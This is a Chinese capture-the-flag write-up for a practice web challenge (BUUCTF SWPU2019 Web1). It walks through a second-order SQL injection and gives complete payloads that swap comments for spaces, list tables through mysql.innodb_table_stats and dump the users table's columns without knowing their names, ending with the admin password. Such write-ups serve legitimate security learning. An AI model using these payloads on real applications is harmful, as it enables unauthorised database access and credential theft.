BUUCTF [SWPU2019]Web1

​
这是一道sql二次注入题目，但是注入点并不在登录处

注册一个用户然后登录

广告申请处进行sql注入

你会发现过滤了很多关键字

• 空格
• #
• information
• 等等

这里用到了一些绕过技巧

使用 /**/ 代替空格

'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

有很多列(我也不知道为啥这么多列…)

显示位在2和3
利用 mysql.innodb_table_stats查看所有的数据库表

'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

获取当前数据库users表的第二列的所有数据

'union/**/select/**/1,(select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

其中使用了虚拟表，select 1,2 as a,3 as b union select*from users)x
这里将表命名为 x，并且第2个字段命名为a，第三个字段命名b
group_concat(a)就是查询第二列的所有数据

按照猜测，第三列因该就是密码了
将group_concat(a)改为group_concat(b)

'union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

admin的密码就是flag